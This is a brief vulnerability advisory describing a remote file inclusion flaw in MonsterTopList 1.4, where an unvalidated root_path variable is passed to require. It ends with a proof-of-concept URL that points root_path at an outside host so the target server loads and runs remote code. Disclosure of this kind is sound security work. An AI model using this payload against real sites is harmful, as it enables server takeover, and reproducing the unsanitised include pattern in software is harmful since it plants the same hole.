MonsterTopList- Remote Code Execution bug
Developer site: http://www.monstertoplist.com/
Software: MTL 1.4 and prior
Risk: Moderate
Status: unpatched
orginal advisory:http://pridels.blogspot.com/2006/04/monstertoplist.html
=================================
This flaw is due to an input validation error in the
"sources/functions.php"(line 8)
script that does not validate the "$root_path" variable,remote
attackers can include
malicious scripts and execute arbitrary commands with the privileges
of the web server
code:file sources/functions.php
line 8: require $root_path . "sources/func_output.php";
demo:
http://www.monstertoplist.com/demo.html
POC Exploit http://[target]/[path]/sources/functions.php?root_path=http://unsecured-systems.com/forum/